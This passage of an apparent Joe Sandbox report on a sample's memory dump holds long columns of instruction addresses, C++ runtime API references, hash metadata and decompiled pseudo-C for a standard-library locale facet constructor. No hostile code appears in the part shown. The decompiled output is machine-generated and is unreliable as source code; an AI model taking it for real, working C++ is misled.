                                                                                      0x0040872c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040871a
                                                                                      0x0040871a
                                                                                      0x0040871f
                                                                                      0x00408722
                                                                                      0x0040872e
                                                                                      0x0040872e
                                                                                      0x00408731
                                                                                      0x00408733
                                                                                      0x00408740
                                                                                      0x00408742
                                                                                      0x00408745
                                                                                      0x0040874b
                                                                                      0x0040874b
                                                                                      0x0040874e
                                                                                      0x00408750
                                                                                      0x0040875e
                                                                                      0x00408752
                                                                                      0x00408752
                                                                                      0x00408755
                                                                                      0x00408757
                                                                                      0x00408759
                                                                                      0x00408759
                                                                                      0x00408759
                                                                                      0x00408757
                                                                                      0x00408768
                                                                                      0x0040876d
                                                                                      0x00408774
                                                                                      0x00408778
                                                                                      0x0040877f
                                                                                      0x00408785
                                                                                      0x0040878c
                                                                                      0x00408790
                                                                                      0x00408793
                                                                                      0x00408797
                                                                                      0x0040879a
                                                                                      0x0040879d
                                                                                      0x004087a0
                                                                                      0x004087a3
                                                                                      0x004087a7
                                                                                      0x004087a9
                                                                                      0x0040888f
                                                                                      0x00408894
                                                                                      0x00408895
                                                                                      0x00408896
                                                                                      0x00408897
                                                                                      0x00408898
                                                                                      0x00408899
                                                                                      0x0040889a
                                                                                      0x0040889b
                                                                                      0x0040889c
                                                                                      0x0040889d
                                                                                      0x0040889e
                                                                                      0x0040889f
                                                                                      0x004088a0
                                                                                      0x004088a1
                                                                                      0x004088a3
                                                                                      0x004088a5
                                                                                      0x004088b0
                                                                                      0x004088b1
                                                                                      0x004088b4
                                                                                      0x004088b9
                                                                                      0x004088bb
                                                                                      0x004088be
                                                                                      0x004088bf
                                                                                      0x004088c0
                                                                                      0x004088c1
                                                                                      0x004088c5
                                                                                      0x004088cb
                                                                                      0x004088d3
                                                                                      0x004088d6
                                                                                      0x004088db
                                                                                      0x004088e2
                                                                                      0x004088e8
                                                                                      0x004088ee
                                                                                      0x004088f1
                                                                                      0x004088f3
                                                                                      0x004088f9
                                                                                      0x004088fe
                                                                                      0x00408904
                                                                                      0x00408906
                                                                                      0x0040890b
                                                                                      0x0040890b
                                                                                      0x0040890c
                                                                                      0x00408911
                                                                                      0x00408911
                                                                                      0x00408919
                                                                                      0x0040891e
                                                                                      0x0040891e
                                                                                      0x00408924
                                                                                      0x00408927
                                                                                      0x0040892e
                                                                                      0x00408931
                                                                                      0x00408934
                                                                                      0x00408942
                                                                                      0x00408942
                                                                                      0x00408944
                                                                                      0x00000000
                                                                                      0x00408936
                                                                                      0x00408939
                                                                                      0x0040893c
                                                                                      0x0040893e
                                                                                      0x004089a0
                                                                                      0x004089a3
                                                                                      0x004089ad
                                                                                      0x004089b5
                                                                                      0x004089b6
                                                                                      0x004089b7
                                                                                      0x004089bb
                                                                                      0x004089c5
                                                                                      0x00408940
                                                                                      0x00408947
                                                                                      0x00408947
                                                                                      0x0040894b
                                                                                      0x00408960
                                                                                      0x00408960
                                                                                      0x00408962
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040894d
                                                                                      0x0040894d
                                                                                      0x00408952
                                                                                      0x00408955
                                                                                      0x00408964
                                                                                      0x00408964
                                                                                      0x00408966
                                                                                      0x00408973
                                                                                      0x00408978
                                                                                      0x0040897b
                                                                                      0x0040897e
                                                                                      0x004089c6
                                                                                      0x004089cb
                                                                                      0x004089cc
                                                                                      0x004089cd
                                                                                      0x004089ce
                                                                                      0x004089cf
                                                                                      0x004089d0
                                                                                      0x004089d1
                                                                                      0x004089d3
                                                                                      0x004089d4
                                                                                      0x004089d5
                                                                                      0x004089d7
                                                                                      0x004089d9
                                                                                      0x004089db
                                                                                      0x00408a27
                                                                                      0x00408a2a
                                                                                      0x004089e0
                                                                                      0x004089e0
                                                                                      0x004089e0
                                                                                      0x004089e3
                                                                                      0x004089e6
                                                                                      0x00000000
                                                                                      0x004089e8
                                                                                      0x004089e8
                                                                                      0x004089ea
                                                                                      0x004089eb
                                                                                      0x004089f1
                                                                                      0x00408a05
                                                                                      0x00408a05
                                                                                      0x00408a07
                                                                                      0x00408a0c
                                                                                      0x00000000
                                                                                      0x004089f3
                                                                                      0x004089f3
                                                                                      0x004089f6
                                                                                      0x004089fe
                                                                                      0x00408a01
                                                                                      0x00408a2b
                                                                                      0x00408a30
                                                                                      0x00408a31
                                                                                      0x00408a32
                                                                                      0x00408a33
                                                                                      0x00408a34
                                                                                      0x00408a35
                                                                                      0x00408a36
                                                                                      0x00408a37
                                                                                      0x00408a38
                                                                                      0x00408a39
                                                                                      0x00408a3a
                                                                                      0x00408a3b
                                                                                      0x00408a3c
                                                                                      0x00408a3d
                                                                                      0x00408a3e
                                                                                      0x00408a3f
                                                                                      0x00408a40
                                                                                      0x00408a41
                                                                                      0x00408a43
                                                                                      0x00408a46
                                                                                      0x00408a47
                                                                                      0x00408a49
                                                                                      0x00408a50
                                                                                      0x00408a51
                                                                                      0x00408a54
                                                                                      0x00408a59
                                                                                      0x00408a5c
                                                                                      0x00408a5d
                                                                                      0x00408a5f
                                                                                      0x00408b6d
                                                                                      0x00000000
                                                                                      0x00408a65
                                                                                      0x00408a65
                                                                                      0x00408a68
                                                                                      0x00408a6d
                                                                                      0x00408a70
                                                                                      0x00408a73
                                                                                      0x00408a76
                                                                                      0x00408a78
                                                                                      0x00408aa5
                                                                                      0x00408aa7
                                                                                      0x00408aa9
                                                                                      0x00408aab
                                                                                      0x00408ab4
                                                                                      0x00408ab6
                                                                                      0x00408ab8
                                                                                      0x00408abb
                                                                                      0x00408abb
                                                                                      0x00408abe
                                                                                      0x00408ac4
                                                                                      0x00408ad3
                                                                                      0x00408ad5
                                                                                      0x00408ae7
                                                                                      0x00408ae7
                                                                                      0x00408ad7
                                                                                      0x00408ad8
                                                                                      0x00408add
                                                                                      0x00408ae0
                                                                                      0x00408ae3
                                                                                      0x00408ae3
                                                                                      0x00000000
                                                                                      0x00408ac6
                                                                                      0x00408ac6
                                                                                      0x00408ac6
                                                                                      0x00408ac9
                                                                                      0x00408acb
                                                                                      0x00408b72
                                                                                      0x00408b72
                                                                                      0x00000000
                                                                                      0x00408ad1
                                                                                      0x00000000
                                                                                      0x00408ad1
                                                                                      0x00408acb
                                                                                      0x00408aad
                                                                                      0x00408aad
                                                                                      0x00000000
                                                                                      0x00408aad
                                                                                      0x00408a7a
                                                                                      0x00408a7a
                                                                                      0x00408a7c
                                                                                      0x00408a81
                                                                                      0x00408a81
                                                                                      0x00408a84
                                                                                      0x00408a85
                                                                                      0x00408a8a
                                                                                      0x00408a8d
                                                                                      0x00408a8f
                                                                                      0x00408b77
                                                                                      0x00408b77
                                                                                      0x00408b7c
                                                                                      0x00408b7d
                                                                                      0x00408b7e
                                                                                      0x00408b7f
                                                                                      0x00408b80
                                                                                      0x00408b81
                                                                                      0x00408b83
                                                                                      0x00408b86
                                                                                      0x00408b87
                                                                                      0x00408b89
                                                                                      0x00408b90
                                                                                      0x00408b91
                                                                                      0x00408b94
                                                                                      0x00408b99
                                                                                      0x00408b9c
                                                                                      0x00408b9d
                                                                                      0x00408b9f
                                                                                      0x00408ced
                                                                                      0x00000000
                                                                                      0x00408ba5
                                                                                      0x00408ba5
                                                                                      0x00408ba8
                                                                                      0x00408bad
                                                                                      0x00408bb0
                                                                                      0x00408bb3
                                                                                      0x00408bb6
                                                                                      0x00408bb8
                                                                                      0x00408be5
                                                                                      0x00408be7
                                                                                      0x00408be9
                                                                                      0x00408beb
                                                                                      0x00408bf4
                                                                                      0x00408bf6
                                                                                      0x00408bf8
                                                                                      0x00408bfb
                                                                                      0x00408bfb
                                                                                      0x00408bfe
                                                                                      0x00408c04
                                                                                      0x00408c13
                                                                                      0x00408c15
                                                                                      0x00408c27
                                                                                      0x00408c27
                                                                                      0x00408c17
                                                                                      0x00408c18
                                                                                      0x00408c1d
                                                                                      0x00408c20
                                                                                      0x00408c23
                                                                                      0x00408c23
                                                                                      0x00000000
                                                                                      0x00408c06
                                                                                      0x00408c06
                                                                                      0x00408c06
                                                                                      0x00408c09
                                                                                      0x00408c0b
                                                                                      0x00408cf2
                                                                                      0x00408cf2
                                                                                      0x00000000
                                                                                      0x00408c11
                                                                                      0x00000000
                                                                                      0x00408c11
                                                                                      0x00408c0b
                                                                                      0x00408bed
                                                                                      0x00408bed
                                                                                      0x00000000
                                                                                      0x00408bed
                                                                                      0x00408bba
                                                                                      0x00408bba
                                                                                      0x00408bbc
                                                                                      0x00408bc1
                                                                                      0x00408bc1
                                                                                      0x00408bc4
                                                                                      0x00408bc5
                                                                                      0x00408bca
                                                                                      0x00408bcd
                                                                                      0x00408bcf
                                                                                      0x00408cf7
                                                                                      0x00408cf7
                                                                                      0x00408cfc
                                                                                      0x00408cfd
                                                                                      0x00408cfe
                                                                                      0x00408cff
                                                                                      0x00408d00
                                                                                      0x00408d01
                                                                                      0x00408d03
                                                                                      0x00408d06
                                                                                      0x00408d07
                                                                                      0x00408d09
                                                                                      0x00408d10
                                                                                      0x00408d11
                                                                                      0x00408d14
                                                                                      0x00408d19
                                                                                      0x00408d1c
                                                                                      0x00408d1d
                                                                                      0x00408d1f
                                                                                      0x00408e4c
                                                                                      0x00000000
                                                                                      0x00408d25
                                                                                      0x00408d25
                                                                                      0x00408d28
                                                                                      0x00408d2d
                                                                                      0x00408d30
                                                                                      0x00408d33
                                                                                      0x00408d36
                                                                                      0x00408d38
                                                                                      0x00408d65
                                                                                      0x00408d67
                                                                                      0x00408d69
                                                                                      0x00408d6b
                                                                                      0x00408d74
                                                                                      0x00408d76
                                                                                      0x00408d78
                                                                                      0x00408d7b
                                                                                      0x00408d7b
                                                                                      0x00408d7e
                                                                                      0x00408d84
                                                                                      0x00408d93
                                                                                      0x00408d95
                                                                                      0x00408da7
                                                                                      0x00408da7
                                                                                      0x00408d97
                                                                                      0x00408d98
                                                                                      0x00408d9d
                                                                                      0x00408da0
                                                                                      0x00408da3
                                                                                      0x00408da3
                                                                                      0x00000000
                                                                                      0x00408d86
                                                                                      0x00408d86
                                                                                      0x00408d86
                                                                                      0x00408d89
                                                                                      0x00408d8b
                                                                                      0x00408e51
                                                                                      0x00408e51
                                                                                      0x00000000
                                                                                      0x00408d91
                                                                                      0x00000000
                                                                                      0x00408d91
                                                                                      0x00408d8b
                                                                                      0x00408d6d
                                                                                      0x00408d6d
                                                                                      0x00000000
                                                                                      0x00408d6d
                                                                                      0x00408d3a
                                                                                      0x00408d3a
                                                                                      0x00408d3c
                                                                                      0x00408d41
                                                                                      0x00408d41
                                                                                      0x00408d44
                                                                                      0x00408d45
                                                                                      0x00408d4a
                                                                                      0x00408d4d
                                                                                      0x00408d4f
                                                                                      0x00408e56
                                                                                      0x00408e56
                                                                                      0x00408e5b
                                                                                      0x00408e5c
                                                                                      0x00408e5d
                                                                                      0x00408e5e
                                                                                      0x00408e5f
                                                                                      0x00408e60
                                                                                      0x00408e62
                                                                                      0x00408e64
                                                                                      0x004071d0
                                                                                      0x004071d1
                                                                                      0x004071d3
                                                                                      0x004071d7
                                                                                      0x0040723d
                                                                                      0x0040723e
                                                                                      0x004071d9
                                                                                      0x004071dc
                                                                                      0x004071dd
                                                                                      0x004071de
                                                                                      0x004071eb
                                                                                      0x00407201
                                                                                      0x0040720a
                                                                                      0x0040721e
                                                                                      0x0040721e
                                                                                      0x00407220
                                                                                      0x00407228
                                                                                      0x0040722e
                                                                                      0x00407235
                                                                                      0x00000000
                                                                                      0x0040720c
                                                                                      0x0040720c
                                                                                      0x0040720f
                                                                                      0x00407212
                                                                                      0x0040721a
                                                                                      0x0040723f
                                                                                      0x00407244
                                                                                      0x00407245
                                                                                      0x00407246
                                                                                      0x00407247
                                                                                      0x00407248
                                                                                      0x00407249
                                                                                      0x0040724a
                                                                                      0x0040724b
                                                                                      0x0040724c
                                                                                      0x0040724d
                                                                                      0x0040724e
                                                                                      0x0040724f
                                                                                      0x00407250
                                                                                      0x00407253
                                                                                      0x00407257
                                                                                      0x00407258
                                                                                      0x0040725a
                                                                                      0x00407260
                                                                                      0x00407262
                                                                                      0x00407265
                                                                                      0x0040726a
                                                                                      0x00407271
                                                                                      0x0040721c
                                                                                      0x0040721c
                                                                                      0x00000000
                                                                                      0x0040721c
                                                                                      0x0040721a
                                                                                      0x0040720a
                                                                                      0x00408e6a
                                                                                      0x00408e6a
                                                                                      0x00408e6a
                                                                                      0x00408d55
                                                                                      0x00408d55
                                                                                      0x00408d58
                                                                                      0x00408d5b
                                                                                      0x00408d5e
                                                                                      0x00408da9
                                                                                      0x00408dac
                                                                                      0x00408db3
                                                                                      0x00408db9
                                                                                      0x00408dbc
                                                                                      0x00408dc1
                                                                                      0x00408dc4
                                                                                      0x00408dc8
                                                                                      0x00408dcb
                                                                                      0x00408dcc
                                                                                      0x00408e23
                                                                                      0x00408e24
                                                                                      0x00408e25
                                                                                      0x00408e31
                                                                                      0x00408e3c
                                                                                      0x00408e41
                                                                                      0x00408e49
                                                                                      0x00408dce
                                                                                      0x00408dce
                                                                                      0x00408dd0
                                                                                      0x00408dd1
                                                                                      0x00408dd2
                                                                                      0x00408de0
                                                                                      0x00408de8
                                                                                      0x00408dee
                                                                                      0x00408def
                                                                                      0x00408df2
                                                                                      0x00408df8
                                                                                      0x00408e0c
                                                                                      0x00408e0c
                                                                                      0x00408e0e
                                                                                      0x00408e16
                                                                                      0x00408e20
                                                                                      0x00408dfa
                                                                                      0x00408dfa
                                                                                      0x00408dfd
                                                                                      0x00408e00
                                                                                      0x00408e02
                                                                                      0x00408e05
                                                                                      0x00408e08
                                                                                      0x00000000
                                                                                      0x00408e0a
                                                                                      0x00408e0a
                                                                                      0x00000000
                                                                                      0x00408e0a
                                                                                      0x00408e08
                                                                                      0x00408df8
                                                                                      0x00408dcc
                                                                                      0x00408d4f
                                                                                      0x00408d38
                                                                                      0x00408bd5
                                                                                      0x00408bd5
                                                                                      0x00408bd8
                                                                                      0x00408bdb
                                                                                      0x00408bde
                                                                                      0x00408c29
                                                                                      0x00408c2c
                                                                                      0x00408c33
                                                                                      0x00408c36
                                                                                      0x00408c3b
                                                                                      0x00408c3e
                                                                                      0x00408c42
                                                                                      0x00408c45
                                                                                      0x00408c4d
                                                                                      0x00408c50
                                                                                      0x00408c54
                                                                                      0x00408c57
                                                                                      0x00408cb9
                                                                                      0x00408cba
                                                                                      0x00408cbb
                                                                                      0x00408cc7
                                                                                      0x00408cd2
                                                                                      0x00408cd8
                                                                                      0x00408ce0
                                                                                      0x00408cea
                                                                                      0x00408c59
                                                                                      0x00408c59
                                                                                      0x00408c5b
                                                                                      0x00408c5c
                                                                                      0x00408c5d
                                                                                      0x00408c6b
                                                                                      0x00408c7c
                                                                                      0x00408c84
                                                                                      0x00408c87
                                                                                      0x00408c88
                                                                                      0x00408c8e
                                                                                      0x00408ca2
                                                                                      0x00408ca2
                                                                                      0x00408ca4
                                                                                      0x00408cac
                                                                                      0x00408cb6
                                                                                      0x00408c90
                                                                                      0x00408c90
                                                                                      0x00408c93
                                                                                      0x00408c96
                                                                                      0x00408c98
                                                                                      0x00408c9b
                                                                                      0x00408c9e
                                                                                      0x00000000
                                                                                      0x00408ca0
                                                                                      0x00408ca0
                                                                                      0x00000000
                                                                                      0x00408ca0
                                                                                      0x00408c9e
                                                                                      0x00408c8e
                                                                                      0x00408c57
                                                                                      0x00408bcf
                                                                                      0x00408bb8
                                                                                      0x00408a95
                                                                                      0x00408a95
                                                                                      0x00408a98
                                                                                      0x00408a9b
                                                                                      0x00408a9e
                                                                                      0x00408ae9
                                                                                      0x00408ae9
                                                                                      0x00408af0
                                                                                      0x00408af3
                                                                                      0x00408af6
                                                                                      0x00408af7
                                                                                      0x00408b48
                                                                                      0x00408b49
                                                                                      0x00408b4a
                                                                                      0x00408b4f
                                                                                      0x00408b5a
                                                                                      0x00408b5d
                                                                                      0x00408b62
                                                                                      0x00408b6a
                                                                                      0x00408af9
                                                                                      0x00408af9
                                                                                      0x00408afb
                                                                                      0x00408afc
                                                                                      0x00408afd
                                                                                      0x00408b02
                                                                                      0x00408b05
                                                                                      0x00408b0e
                                                                                      0x00408b0f
                                                                                      0x00408b12
                                                                                      0x00408b17
                                                                                      0x00408b1d
                                                                                      0x00408b31
                                                                                      0x00408b31
                                                                                      0x00408b33
                                                                                      0x00408b3b
                                                                                      0x00408b45
                                                                                      0x00408b1f
                                                                                      0x00408b1f
                                                                                      0x00408b22
                                                                                      0x00408b25
                                                                                      0x00408b27
                                                                                      0x00408b2a
                                                                                      0x00408b2d
                                                                                      0x00000000
                                                                                      0x00408b2f
                                                                                      0x00408b2f
                                                                                      0x00000000
                                                                                      0x00408b2f
                                                                                      0x00408b2d
                                                                                      0x00408b1d
                                                                                      0x00408af7
                                                                                      0x00408a8f
                                                                                      0x00408a78
                                                                                      0x00408a03
                                                                                      0x00408a03
                                                                                      0x00000000
                                                                                      0x00408a03
                                                                                      0x00408a01
                                                                                      0x004089f1
                                                                                      0x00000000
                                                                                      0x00408a0f
                                                                                      0x00408a0f
                                                                                      0x00408a16
                                                                                      0x00408a1d
                                                                                      0x00408a20
                                                                                      0x00408a23
                                                                                      0x00408a23
                                                                                      0x00000000
                                                                                      0x004089e0
                                                                                      0x00408980
                                                                                      0x00408980
                                                                                      0x00408983
                                                                                      0x00408987
                                                                                      0x0040898b
                                                                                      0x00408990
                                                                                      0x00408997
                                                                                      0x0040899a
                                                                                      0x00000000
                                                                                      0x0040899a
                                                                                      0x00408968
                                                                                      0x00408968
                                                                                      0x00000000
                                                                                      0x00408968
                                                                                      0x00408957
                                                                                      0x0040895d
                                                                                      0x00000000
                                                                                      0x0040895d
                                                                                      0x00408955
                                                                                      0x0040894b
                                                                                      0x0040893e
                                                                                      0x004087af
                                                                                      0x004087b4
                                                                                      0x004087b9
                                                                                      0x004087c0
                                                                                      0x004087c9
                                                                                      0x004087ce
                                                                                      0x004087d3
                                                                                      0x004087d6
                                                                                      0x004087d9
                                                                                      0x004087db
                                                                                      0x004087de
                                                                                      0x004087e3
                                                                                      0x004087e3
                                                                                      0x004087e6
                                                                                      0x004087e9
                                                                                      0x004087f0
                                                                                      0x004087f2
                                                                                      0x004087f5
                                                                                      0x004087fa
                                                                                      0x004087fa
                                                                                      0x004087fd
                                                                                      0x00408800
                                                                                      0x00408807
                                                                                      0x00408809
                                                                                      0x0040880c
                                                                                      0x00408811
                                                                                      0x00408811
                                                                                      0x00408814
                                                                                      0x00408817
                                                                                      0x0040881e
                                                                                      0x00408820
                                                                                      0x00408823
                                                                                      0x00408828
                                                                                      0x00408828
                                                                                      0x0040882b
                                                                                      0x0040882e
                                                                                      0x00408835
                                                                                      0x00408837
                                                                                      0x0040883a
                                                                                      0x0040883f
                                                                                      0x0040883f
                                                                                      0x00408842
                                                                                      0x00408845
                                                                                      0x0040884c
                                                                                      0x0040884e
                                                                                      0x00408851
                                                                                      0x00408856
                                                                                      0x00408856
                                                                                      0x0040885c
                                                                                      0x00408863
                                                                                      0x00408868
                                                                                      0x0040886c
                                                                                      0x00408870
                                                                                      0x0040887c
                                                                                      0x0040887f
                                                                                      0x00000000
                                                                                      0x0040887f
                                                                                      0x00408735
                                                                                      0x00408735
                                                                                      0x00000000
                                                                                      0x00408735
                                                                                      0x00408724
                                                                                      0x00408727
                                                                                      0x00000000
                                                                                      0x00408727
                                                                                      0x00408722
                                                                                      0x004086ec
                                                                                      0x004086ec
                                                                                      0x004086ef
                                                                                      0x004086f9
                                                                                      0x00408701
                                                                                      0x00408702
                                                                                      0x00408703
                                                                                      0x00408707
                                                                                      0x00408711
                                                                                      0x00408711
                                                                                      0x004086ea
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00408686
                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 004086A8
                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 004086C8
                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 004086EF
                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00408768
                                                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 004087B4
                                                                                      • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 004087CE
                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00408863
                                                                                      • std::_Facet_Register.LIBCPMT ref: 00408870
                                                                                        • Part of subcall function 00412430: std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041243C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegisterstd::invalid_argument::invalid_argument
                                                                                      • String ID: Pr@$bad locale name$tC
                                                                                      • API String ID: 1592514138-2114825477
                                                                                      • Opcode ID: 21ef383dd85b1c7eabeaa1b4621d2919cb3cdd2e7c6c441167aced3a3e44285b
                                                                                      • Instruction ID: ce6ce3d53a677cd5d734712daaf5797b23b25a8e7ecebb72da1bad7b0cdab8cd
                                                                                      • Opcode Fuzzy Hash: 21ef383dd85b1c7eabeaa1b4621d2919cb3cdd2e7c6c441167aced3a3e44285b
                                                                                      • Instruction Fuzzy Hash: B961ADB5D00208DFDB10DFA5DA45BDEBBB4AF14314F14442EE845B7381EB78A948CBA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 63%
                                                                                      			E00408E80(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8) {
                                                                                      				char _v8;
                                                                                      				char _v16;
                                                                                      				char _v20;
                                                                                      				char _v24;
                                                                                      				char _v28;
                                                                                      				char _v32;
                                                                                      				short _v36;
                                                                                      				char _v40;
                                                                                      				short _v44;
                                                                                      				char _v48;
                                                                                      				char _v52;
                                                                                      				char _v56;
                                                                                      				char _v60;
                                                                                      				char _v64;
                                                                                      				char _v68;
                                                                                      				char _v72;
                                                                                      				intOrPtr* _v76;
                                                                                      				intOrPtr* _v80;
                                                                                      				intOrPtr _v84;
                                                                                      				char _v128;
                                                                                      				char _v172;
                                                                                      				signed int _t60;
                                                                                      				intOrPtr* _t63;
                                                                                      				intOrPtr _t66;
                                                                                      				void* _t72;
                                                                                      				char* _t82;
                                                                                      				intOrPtr _t84;
                                                                                      				short _t85;
                                                                                      				char _t87;
                                                                                      				char _t88;
                                                                                      				intOrPtr* _t108;
                                                                                      				intOrPtr* _t109;
                                                                                      				void* _t111;
                                                                                      				intOrPtr _t113;
                                                                                      				intOrPtr _t115;
                                                                                      				intOrPtr* _t118;
                                                                                      				signed int _t122;
                                                                                      				void* _t123;
                                                                                      				void* _t125;
                                                                                      				void* _t126;
                                                                                      				void* _t127;
                                                                                      				void* _t128;
                                                                                      				void* _t129;
                                                                                      
                                                                                      				_t105 = __ebx;
                                                                                      				_push(0xffffffff);
                                                                                      				_push(0x431cf5);
                                                                                      				_push( *[fs:0x0]);
                                                                                      				_t123 = _t122 - 0x9c;
                                                                                      				_push(__esi);
                                                                                      				_push(__edi);
                                                                                      				_t60 =  *0x443048; // 0x9900ec21
                                                                                      				_push(_t60 ^ _t122);
                                                                                      				 *[fs:0x0] =  &_v16;
                                                                                      				_t63 = _a4;
                                                                                      				_t113 = _a8;
                                                                                      				_v76 = _t63;
                                                                                      				_v72 = 0;
                                                                                      				if(_t63 == 0) {
                                                                                      					L23:
                                                                                      					 *[fs:0x0] = _v16;
                                                                                      					return 4;
                                                                                      				} else {
                                                                                      					_t132 =  *_t63;
                                                                                      					if( *_t63 != 0) {
                                                                                      						goto L23;
                                                                                      					} else {
                                                                                      						_t118 = E0041362C(__ebx, _t113, __esi, _t132, 0x18);
                                                                                      						_t125 = _t123 + 4;
                                                                                      						_v80 = _t118;
                                                                                      						_v8 = 0;
                                                                                      						asm("xorps xmm0, xmm0");
                                                                                      						asm("movups [esi], xmm0");
                                                                                      						asm("movq [esi+0x10], xmm0");
                                                                                      						_t8 = _t113 + 4; // 0x0
                                                                                      						_t66 =  *_t8;
                                                                                      						if(_t66 == 0) {
                                                                                      							_t115 = 0x43e90c;
                                                                                      						} else {
                                                                                      							_t115 =  *((intOrPtr*)(_t66 + 0x18));
                                                                                      							if(_t115 == 0) {
                                                                                      								_t10 = _t66 + 0x1c; // 0x1c
                                                                                      								_t115 = _t10;
                                                                                      							}
                                                                                      						}
                                                                                      						_t108 =  &_v68;
                                                                                      						E0041247D(_t108, 0);
                                                                                      						_v64 = 0;
                                                                                      						_v60 = 0;
                                                                                      						_v56 = 0;
                                                                                      						_v52 = 0;
                                                                                      						_v48 = 0;
                                                                                      						_v44 = 0;
                                                                                      						_v40 = 0;
                                                                                      						_v36 = 0;
                                                                                      						_v32 = 0;
                                                                                      						_v28 = 0;
                                                                                      						_v24 = 0;
                                                                                      						_v20 = 0;
                                                                                      						_v8 = 7;
                                                                                      						_t135 = _t115;
                                                                                      						if(_t115 == 0) {
                                                                                      							E00412430("bad locale name");
                                                                                      							goto L25;
                                                                                      						} else {
                                                                                      							E00412760(_t108,  &_v68, _t115);
                                                                                      							_v72 = 1;
                                                                                      							 *((intOrPtr*)(_t118 + 4)) = 0;
                                                                                      							_v8 = 9;
                                                                                      							 *_t118 = 0x434448;
                                                                                      							E0041A69B(_t111, _t118);
                                                                                      							E00412BB1(_t135,  &_v128);
                                                                                      							 *((intOrPtr*)(_t118 + 8)) = 0;
                                                                                      							 *((intOrPtr*)(_t118 + 0x10)) = 0;
                                                                                      							 *((intOrPtr*)(_t118 + 0x14)) = 0;
                                                                                      							_v84 = _t118;
                                                                                      							_v8 = 0xa;
                                                                                      							E00412BB1(_t135,  &_v172);
                                                                                      							_push(1);
                                                                                      							_push(1);
                                                                                      							_t82 = E0041823E();
                                                                                      							_t126 = _t125 + 0x18;
                                                                                      							if(_t82 == 0) {
                                                                                      								L25:
                                                                                      								E004123B3(_t105, __eflags);
                                                                                      								goto L26;
                                                                                      							} else {
                                                                                      								_push(1);
                                                                                      								_push(6);
                                                                                      								 *_t82 = 0;
                                                                                      								 *((intOrPtr*)(_t118 + 8)) = _t82;
                                                                                      								_t108 = E0041823E();
                                                                                      								_t127 = _t126 + 8;
                                                                                      								if(_t108 == 0) {
                                                                                      									L26:
                                                                                      									E004123B3(_t105, __eflags);
                                                                                      									goto L27;
                                                                                      								} else {
                                                                                      									_t84 =  *((intOrPtr*)("false")); // 0x736c6166
                                                                                      									 *_t108 = _t84;
                                                                                      									_t85 =  *0x43e944; // 0x65
                                                                                      									_push(1);
                                                                                      									_push(5);
                                                                                      									 *((short*)(_t108 + 4)) = _t85;
                                                                                      									 *((intOrPtr*)(_t118 + 0x10)) = _t108;
                                                                                      									_t108 = E0041823E();
                                                                                      									_t128 = _t127 + 8;
                                                                                      									if(_t108 == 0) {
                                                                                      										L27:
                                                                                      										_t72 = E004123B3(_t105, __eflags);
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										_t109 =  *_t108;
                                                                                      										__eflags = _t109;
                                                                                      										if(_t109 != 0) {
                                                                                      											return  *((intOrPtr*)( *_t109))(1);
                                                                                      										}
                                                                                      										return _t72;
                                                                                      									} else {
                                                                                      										_t87 = "true"; // 0x65757274
                                                                                      										 *_t108 = _t87;
                                                                                      										_t88 =  *0x43e94c; // 0x0
                                                                                      										 *((char*)(_t108 + 4)) = _t88;
                                                                                      										 *((intOrPtr*)(_t118 + 0x14)) = _t108;
                                                                                      										 *((short*)(_t118 + 0xc)) = 0x2c2e;
                                                                                      										 *_v76 = _t118;
                                                                                      										_v8 = 0xc;
                                                                                      										E004127AB(_t108,  &_v68);
                                                                                      										_t92 = _v24;
                                                                                      										_t129 = _t128 + 4;
                                                                                      										if(_v24 != 0) {
                                                                                      											E0041AC1E(_t92);
                                                                                      											_t129 = _t129 + 4;
                                                                                      										}
                                                                                      										_t93 = _v32;
                                                                                      										_v24 = 0;
                                                                                      										if(_v32 != 0) {
                                                                                      											E0041AC1E(_t93);
                                                                                      											_t129 = _t129 + 4;
                                                                                      										}
                                                                                      										_t94 = _v40;
                                                                                      										_v32 = 0;
                                                                                      										if(_v40 != 0) {
                                                                                      											E0041AC1E(_t94);
                                                                                      											_t129 = _t129 + 4;
                                                                                      										}
                                                                                      										_t95 = _v48;
                                                                                      										_v40 = 0;
                                                                                      										if(_v48 != 0) {
                                                                                      											E0041AC1E(_t95);
                                                                                      											_t129 = _t129 + 4;
                                                                                      										}
                                                                                      										_t96 = _v56;
                                                                                      										_v48 = 0;
                                                                                      										if(_v56 != 0) {
                                                                                      											E0041AC1E(_t96);
                                                                                      											_t129 = _t129 + 4;
                                                                                      										}
                                                                                      										_t97 = _v64;
                                                                                      										_v56 = 0;
                                                                                      										if(_v64 != 0) {
                                                                                      											E0041AC1E(_t97);
                                                                                      										}
                                                                                      										_v64 = 0;
                                                                                      										E004124D5( &_v68);
                                                                                      										goto L23;
                                                                                      									}
                                                                                      								}
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      				}
                                                                                      			}














































                                                                                      0x00408e80
                                                                                      0x00408e83
                                                                                      0x00408e85
                                                                                      0x00408e90
                                                                                      0x00408e91
                                                                                      0x00408e97
                                                                                      0x00408e98
